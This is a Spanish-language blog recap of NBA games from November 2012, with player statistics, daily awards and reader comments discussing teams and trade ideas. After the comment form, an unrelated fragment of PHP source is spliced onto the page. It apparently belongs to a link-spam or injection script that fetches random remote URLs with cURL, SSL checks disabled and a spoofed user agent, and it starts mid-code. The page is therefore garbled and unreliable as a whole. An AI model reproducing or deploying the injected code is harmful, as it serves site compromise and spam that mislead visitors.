La Crónica: Triples con sabor a tranquilidad

25 de November de 2012 por Sancho88

En estos días de agitación profunda en el seno de Los Ángeles, pocos podían esperar que el revulsivo fuera Metta World Peace. El alero de Queens calmó las tensiones producidas por el huracan Sacramento y la tormenta tropical Memphis y anotó 16 de sus 19 puntos en el gran primer cuarto de los Lakers frente a Dallas. MWP anotó en ese cuarto 6/7 en tiros de campo, incluyendo 4 de sus 5 triples en el partido. Su ratio +/- en la pista fue el mejor de los angelinos, con un +34. Paradojicamente, esta vez la paz en L.A. sí que la puso Peace.

Anoche, sin embargo, su rival no fue el que les viene azuzando en postemporada estos últimos años. Dallas sucumbió desde el inicio, con desventajas de hasta 37 puntos (con el 85-48 en el tercer cuarto) y el (115-89) final. El quinteto titular solo fue capaz de anotar 31 puntos, por los 42 de todo el banquillo laker. Con esos mimbres, poquitas opciones tenían los azules. D’Antoni consiguió evitar un 0-5 inicial en los partidos fuera de casa y al menos podrá volver al Staples con la cabeza alta esta vez. Pau, a su vez, se reivindicó con un 13-9-3 en apenas 28 minutos, y Howard también espabiló con respecto a las últimas veladas y sumó 15 puntos, 7 rebotes y 5 robos de balón (la mejor marca de su carrera). Con los hombres grandes aportando, Kobe esta vez pudo estar más tranquilo e igualó los 19 puntos de MWP. Como decimos, la sorpresa la dio la banca con 42 puntos. Y es que Antawn Jamison empieza a demostrar por qué es uno de los mejores anotadores en activo de la NBA. Anoche sus 19 puntos y 15 rebotes supieron a gloria. ¿Quién decía que L.A. no tenía banquillo? Otra cosa distinta es que nadie lo estaba utilizando. Un punto positivo para D’Antoni, que además confió en varios tramos del partido en jugar con Jamison como alero abierto. Jodie Meeks también se sumó a las dobles figuras en anotación, con 11 puntos y 3 triples, además de 5 rebotes y 3 asistencias. Su mejor partido de amarillo.

En Dallas poco que destacar. Vince Carter fue el más profesional, firmando 16 puntos desde el banquillo (4 triples incluídos), y Jae Crowder le ayudó con 15 puntos y 4 robos de balón. Pero si miramos al quinteto, da mucha pena esos 31 puntos en conjunto. Mayo 13, Marion 10, Brand 0 y Collison 2. Dejadme un pañuelo que creo que voy a llorar.

Si los estresados Lakers tuvieron por fin una noche apacible, en Philadelphia no pudieron decir lo mismo los Thunder, quienes tuvieron que superar a los Sixers en la prórroga (116-109) para llegar hasta las 10 victorias este curso. Eso es lo que pasa cuando no metes ni una en los últimos 4 minutos del partido y pretendes no perder. Al menos, tuvieron suerte de contarlo. Los Sixers tampoco estuvieron mucho más acertados en el ‘clutch time’. Eso sí, en la prórroga Durant, Kevin Martin, Westbrook y Sefolosha anotaron un triple por cabeza y, como bien reza nuestro encabezamiento del domingo, esos lanzamientos les dieron la tranquilidad. Estratosféricos Durant+Westbrook, anotando entre los dos 67 puntos, 13 rebotes, 14 asistencias, 6 robos de balón, 4 tapones y 22/45 en TC. ¿Quién dijo que no había química en la pareja? Además, Durant fue muchas veces a la línea de tiros libres y convirtió 15/17. Por eso es el héroe de la noche. Nuestro Serge Ibaka volvió a jugar un gran partido, con 18 puntos y 9 rebotes, aunque curiosamente no sumó ningún tapón esta vez. También es curioso que Nick Collison anotase 14 puntos. El quinto de Pau, Navarro, Calde y Felipón nos soprende de vez en cuando con estas cosas. En ‘Philly’ Thaddeus Young se salió del mapa con 29 puntos y 15 rebotes, pero no valieron para nada, pues la calidad decide las prórrogas, y ahí murieron estos Sixers. Evan Turner se fue hasta los 26 puntos. Así tendría que jugar todos los días.

También las pasaron canutas pero al final ganaron los Heat en el Arena de Miami, sumando así la décima victoria de temporada que les da el liderato en la Conferencia Este. Casi se les atragantan unos Cavaliers dirigidos por el maestro Byron Scott. Este tipo es algo así como un j….. genio de estos de Hollywood que nunca son reconocidos por la academia pero que todos sabemos que firman películas de escándalo. Igualito. Sus ‘Cavs’ no merecen este 3-10. Por sensaciones, estos tipos se están ganando con su juego la aprobación del aficionado medio, que los ve como un equipo limitado pero alegre. Ayer, de nuevo sin Irving, se cargaron algún by-pass en South Beach. Excepto Tyler Zeller, el resto de muchachos que jugaron sumaron más de 10 puntos. Fueron 8 actores secundarios que Scott convierte casi siempre en principales. Chapó para ellos. Alonzo Gee, Tristan Thompson, Dion Waiters, Jeremy Pargo, Omri Casspi, Danny Gibson, C.J. Miles y, como no, el actor secundario Bob… esto, Anderson Varejao, con sus dobles figuras de todos los días y sus 15 rebotes por montera.

Pero como la peli de hoy va de triples, Gibson puso el 108-101 con un triplazo, recordándole a Lebron que abandonó a su ex equipo cuando él siempre fue un cachorro triplista, pero entonces sucedió lo mejor de todo el rodaje. Ray Allen, el Marlon Brando del partido de ayer, anotó 7 puntos en el último minuto y mandó a la lona a los pobrecitos Cavs. Es lo que tiene ser Marlon Brando, que te rascas el bigote, acaricias a un gato y ya está todo hecho; (108-110) en un ‘thriller’ de suspense con un final feliz para Lebron. Siempre gana Lebron si os habéis fijado. Es Curioso. 30 puntos para él, 23 para Bosh, 18 para Wade que reaparecía tras sus averías del taller borbonas y 17 para Marlon ‘Allen’ Brando.

Y averiados sí que están los Clippers. Anoche sumaron su tercera derrota consecutiva en casa de los Hawks (93-104) y se dejaron hacer un hijito por Zaza Pachulia (19+12). Vynny del Negro, en su afan por parecerse a Pat Riley, solo quiere que no le metan canastas, pero el tipo está fracasando. Esta ciclotimia les pasó también el año pasado a los Clippers. Es inexplicable, pero ahora están desconectados del mundo de los vivos y no hay que buscarle muchas más explicaciones. En cuanto se pongan a defender les volverán a salir las cosas seguro. Pero anoche nada de eso sucedió. Atlanta cosechó su quinta victoria consecutiva, y siguen con el record actual de partidos seguidos ganando en la NBA. Horford estuvo tranquilo y discreto, y Josh Smith anotó 17 puntos en apenas 24 minutos. Es extraño, pero Smith juega poco en Atlanta y Pau también en Lakers. ¿Será acaso que alguien está reuniéndose con alguien en algún despacho? Qué desconfiados somos… ‘Basketball reasons’ seguramente. Teague+Lou Williams se ‘zamparon’ a Paul con 37 puntos entre los dos y Blake Griffin volvió a quedarse solo rozando el triple-doble: 22-11-7. Está enfadándose Blake.

En el resto de la jornada los Bobcats ganaron a los Wizards tras dos prórrogas (108-106) e igualan las 7 victorias de la temporada pasada, con el pequeño matiz de haber necesitado 12 partidos para lograrlo, por los 66 partidos del año pasado. Nada, pecata minuta. Genial Byron Mullens con 27 puntos, Kemba Walker coqueteando con el triple-doble y Sessions+Gordon combinándose para anotar 40 puntos desde el banquillo. En los Wizards, los quintetos varían más que un partido de voleybol y su mejor jugador fue Martell Webster con 21 puntos. El 0-11 está ahí, son el duodécimo equipo en la historia de la NBA en empezar con tanta tristeza, la noria sigue dando vueltas y los vómitos se cocinan calentitos. Estos acaban como en la peli de Este niño es un demonio 2, vomitándose unos a otros. Al tiempo.

En Sacramento volvimos a ver al Tyreke Evans original. A los Jazz siempre se la lía, el año pasado les metió más de 30 puntos, y ayer se desmarcó con un 27-5-5. Ya sabemos, son sus números del All-Star que jamás será, pero que a veces si es. Su pasotismo es su talón de aquiles. Con su chicle a cuestas, guió a unos Kings que empiezan a jugar como un equipo (no me lo creo ni yo) en la victoria ‘Back to back’ frente a los Jazz (97-108). Jason Thompson y DeMarcus Cousins ayudaron con 30 puntos y 18 rebotes entre los dos y Aaron Brooks definitivamente se ha quedado con el puesto de ‘point guard’ titular. Isaiah Thomas no está nada fino, y Brooks sí las enchufa de tres. Ayer 3/4 en triples, 13 puntos y 4 robos de balón; nada que no pueda igualar Thomas, pero que de momento no está haciendo. En los Jazz siguen pensando que la defensa es algo así como una cartera ministerial de algún país que no es el suyo, y siguieron en su línea, sin defender nada. Partido decepcionante con Randy Foye despertando de su letargo con 17 puntos, Tinsley jugando sólido ante la baja de Mo Williams y poquito más. Necesitan espabilar atrás para volver a jugar los Playoffs este año.

En Milwaukee los Bulls ahondaron en la mini crisis de los Bucks, que cosecharon anoche su tercera derrota consecutiva (93-86) y la novena seguida contra los Bulls. Fue un partido típico del Este, típico de los Bulls; agotando posesiones, defendiendo al límite de la legalidad y con Carlos Boozer enchufado hasta el último cuarto. Bueno, esto no es lo típico, pero es que este año Boozer está jugando irreconociblemente bien. 22+19 anoche, acompañado por los 22 puntos y 10/10 en tiros libres de RIP Hamilton, y el 14+8 de Luol Deng. Mientras los Bulls siguen aguantando sin D-Rose, en Milwaukee solo aparecieron los gemelos JenEllis para anotar 40 puntos entre los dos. Dalembert no jugó ni un solo minuto y Pryzbilla se marcó un partidazo de esos que nos tiene acostumbrados: 0-2-3. Para lo que es él, es un partidazo, eso es innegable.

Para acabar, los Warriors no tuvieron piedad de unos Wolves que deambulan con la tercera peor marca de derrotas consecutivas en la liga (85-96). Anoche cosecharon la quinta derrota consecutiva. El 15+15 de Love fue lo mejor de los lobeznos, junto al 17+6 de Pekovic. Sin embargo, estuvieron desastrosos en el triple, con un triste 5/27 y eso lo aprovecharon los Warriors para sumar su octava victoria de temporada. GSW, al contrario que los Cavs, dan la sensación de merecer menos partidos de los que han ganado, pero solo son sensaciones. Lo cierto es que ayer jugaron muy bien sus bajitos, con Klay Thompson y Steph Curry combinándose para anotar 44 puntos, David Lee y Carl Landry percutiendo contra la defensa ‘lobuna’ y Harrison Barnes dejándonos flipados con un doble-doble 10+11 y una pinta de alero ¡crack! superjugón que no puede con ella. Entre él y Kidd-Gilchrist nos están divirtiendo de lo lindo. Físicamente imparables ambos.

PREMIOS

MVP:  Kevin Durant. 37 puntos, 8 rebotes, 5 asistencias, 4 robos de balón, 3 tapones, 10/22 en tiros de campo y 15/17 en tiros libres. No hay mucho más que decir. Bueno sí, ¡¡JUGÓN!!

Rookie: Sin Lillard y Davis en la cancha, el premio de hoy está más competido, pero se lo vamos a dar a Harrison Barnes. Su 10+11 nos divierte por los mates que se marca el amigo. Menudo bruto está hecho. Bradley Beal también sumó un doble-doble en la derrota de los Wizards, con 13 puntos, 10 rebotes y 5 asistencias. Jae Crowder jugó bien en la derrota de los Mavs contra Lakers. 15 puntos, 4 rebotes y 4 robos de balón que no evitaron, sin embargo, el desastre texano. En los Cavs Dion Waiters anotó 16 puntos; y en los Bobcats Taylor con 12 puntos, y Michael Kidd-Gilchrist con 10 puntos y 8 rebotes también cuajaron buenas actuaciones. T-Rob no lo hizo mal en los Kings en sus 15 minutos de rigor. 9+4 para él. Y los pobres rookies de Oklahoma vieron un día más las hazañas de sus otrora rookies ídolos evolucionados desde la fría madera del banquillo. Luego, Zeller fracasó en los Cavs y Ezeli en los Warriors. Este hombre solo vale para defender.

Sorpresa: Tyreke, ¡has vuelto! (aunque te volverás a ir mañana seguramente). Bueno, nos da igual. Su 27+5+5 liderando una victoria nos pone alegres a los sacramentinos. Hoy comeremos chicle en su honor. Los 17 puntos de Randy Foye también son sorpresivos.

Decepción: Caron Butler. Irrelevante, irreconocible, decepcionante, imperceptible, desapercibido… y así podríamos seguir hasta mañana. Menuda temporada de m… que se está marcando el amigo. 3 puntos y 2 rebotes en 25 minutos. ¿Se dará cuenta algún día Del Negro para qué ha fichado a Matt Barnes? Elton Brand y Darren Collison completan el podio de las decepciones.

Esfuerzo en vano: Blake Griffin. 22+11+7 y no valió para nada. Luego se le queda la cara que se le queda, que podría fulminar a un Mike Brown con la mirada igual que Kobe. Sus Clippers han desaparecido del mapa la última semana. A ver si cierra noviembre con dignidad. A este paso les van a pasar los Lakers, y eso ya sería preocupante. El 29+15 de Thaddeus Young contra OKC se lleva la plata en el día de hoy.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. Guillermo dice:
    #1

    “GSW, al contrario que los Cavs, dan la sensación de merecer menos partidos de los que han ganado”….
    Si tú lo dices…

      Citar

  2. Sancho88 dice:
    #2

    buena cita, lo que pasa es que al final ponía… solo son sensaciones. Yo los he visto este año contra los Kings, y se rascan un pelín los huevecillos defendiendo. Es decir, tienen calidad a raudales, pero a veces están jugando pasivos. Hay que ser autocríticos. Jugando así no se meterán en playoffs, tienen que ponerle mas actitud

      Citar

  3. MagicJohnson32 dice:
    #3

    Ya que mencionas lo de Przybilla… ¿¿Qué leches pretende Scott Skiles?? Se cargó a Gooden tras hacer un final de temporada buenísimo y ahora se carga a Dalembert cuando estaba jugando bien… ¡¡¡para poner a Przybilla!!!

      Citar

  4. kabom dice:
    #4

    MagicJohnson32:
    Ya que mencionas lo de Przybilla… ¿¿Qué leches pretende Scott Skiles?? Se cargó a Gooden tras hacer un final de temporada buenísimo y ahora se carga a Dalembert cuando estaba jugando bien… ¡¡¡para poner a Przybilla!!!

    Y lo que es peor, lo tengo en la Hoops y me hizo perder un partido en la prorroga xDD
    Gran y extensa crónica sancho. Soy el único que piensa que si skiles deja de hacer cosas extrañas, los bucks serán playoffs fijos? Los he visto contras mis celtics y miami, y me dejaron grandes sensaciones, jennings y ellis jugando en equipo lo más que pueden (¿contract year?), dunleavy fino y lo poco q ha jugado henson me ha gustado mucho.
    Tenia a skiles por un coach inteligente, pero no maniático.

      Citar

  5. nba dice:
    #5

    Yo creo que a Boozer le han debido de leer la cartilla en los despachos de Bulls, por eso su cambio tan radical.
    No se que pasa pero parece que la vuelta de Love a los Wolves ha provocado una mala racha y parece que ha perjudicado claramente a la evoucion tan positiva de Williams, a ver si tienen una noticia positiva pronto, como la vuelta de Ricky, que les permita cambiar la dinamica con el jefe dirigiendo

      Citar

  6. Santi dice:
    #6

    Guillermo:
    “GSW, al contrario que los Cavs, dan la sensación de merecer menos partidos de los que han ganado”….
    Si tú lo dices…

    Ya te digo, mira que tener un equipo con Varejao (mira que quitar lo de center para el all star -y no estoy fumao, te cuen), Irving (shophomore en el all star weekend), Waiters (rookie en idem), Gee, TT (^^), Zeller (rookie en all star weekend (?)), CJ Miles (“gran refuerzo” para Lakers en preseason…), Omri Caspi… . Yo les he visto jugar varios partidos y no defenderan gran cosa, pero se han cascado un partidazo contra Miami y contra Bucks y Magic lo tuviero a egg, como se suele decir. A este equipo le metes un Marc Gasol de 4 y acaba la temporada con mas de 50 victorias en el Este. Y no fumo cosas raras, que conste

      Citar

  7. R1Molano dice:
    #7

    Sancho, el de los Kings es nuestro peor partido de la temporada de largo; un horror que nada tiene que ver con todo lo bueno que estamos haciendo; junto con el esperpento que hicimos en LA contra los Lakers (aunque me da a mi que ese partido fue como el de OKC, en la cabeza de un back to back y a competir solo si iban bien dadas).

    Yo esa sensación de llevar mas victorias de las merecidas… ganamos en la prorroga en Dallas (para mi inmerecido no fue) y tiramos dos opciones clarisimas de ganar en casa contra Denver en 2 prorrogas.
    Mas allá… victoria ajustada at Clippers (y creo que merecida, que fuimos arriba todo el partido).

    Yo te animo a ver a los Warriors algún partido mas, veras que es algo que nada tiene que ver con lo que has visto otros años o lo que viste ese partido (que también es mala suerte que escogieras ese)

      Citar

  8. Esteban dice:
    #8

    Nueva victoria para los nets frente a un portland sin aldrige

    Los blazers tienen el peor banco de la NBA, su aporte es nulo, hasta los wizards estan mejor en ese sentido

    Sobre los nets, otro buen partido de jojo, de a poco va engranando, si muestra su mejor version, los nets son realmente peligrosos
    Quien se ve fuera de los esquyemas, y fuera de forma es wallace, habra q ver como evoluciona
    Blatche se mantiene en linea fina de a momento

    Llamativo es la nula participacion de teletovic, con un contrato nada bajo, que bien q les vendria a los lakers un 4 tirador asi, en brooklyn no lo usan en absoluto, habria q ver como se podria hacer un trade ahí,
    Jamison por teletovic? Tendria algun sentido, los nets se desprenden de un jugador con 3 años de contrato q no lo utilizan en lo mas minimo, por un veterano con un año de contrato q podria entrar en la rotacion hoy mismo y dar algun aporte

    Para los lakers es un riesgo mayor, pero lo veo muy benefioso,
    Obviamente esto no ocurrira

    Sobre el trade pau por smith, tendria sentido si atlanta mete a lou williams en la discusion y morrow por q no tambien

    Ese trade cae como anillo al dedo a los lakers q sumarian a un smith q puiede jugar de 3 y 4, y le daria otra energia al equipo, ademas de lou williams le daria los puntos que estan necesitando desde el banco

    Atlanta con una dupla horford y gasol bajo los aros es serio candidato a PO este año y con el espacio q les quedaria podrian ser un equipo serio desde el proximo año

      Citar

  9. melo15 dice:
    #9

    Esteban vale ya de traspasos absurdos, Pau por Smith es una tomadura de pelo a los Hawks y encima metes a Lou Williams, y Jamison por Teletovis igual, un tio como Jamison que es ex all star por un recien llegado que no se sabe si se podra adaptar a la NBA.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>